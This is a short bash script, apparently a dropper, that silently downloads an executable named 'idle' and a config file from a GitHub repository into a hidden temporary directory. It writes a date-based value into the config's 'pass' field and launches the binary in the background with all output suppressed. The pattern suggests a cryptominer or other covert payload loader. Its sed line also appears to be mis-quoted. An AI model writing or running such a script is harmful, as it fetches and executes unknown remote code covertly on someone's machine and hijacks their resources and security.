#!/bin/bash


url="https://github.com/hanrzme/canuqw/raw/refs/heads/main"
work=`mktemp -d -t .XXXXXXXXX`

name=`TZ=":Asia/Shanghai" date '+%Y%m%d'`

[ -d "${work}" ] || exit 1
trap "rm -rf ${work}" EXIT
cd "${work}"
curl -sSLo "idle" "${url}/idle" 2>/dev/null
curl -sSLo "config.json" "${url}/idle.json" 2>/dev/null
[ -f "config.json" ] && [ -n "$name" ] && sed -i "s/"pass":.*,/"pass": "${name}",/g" "config.json"
chmod -R a+x ./
./idle >/dev/null 2>&1 &
wait
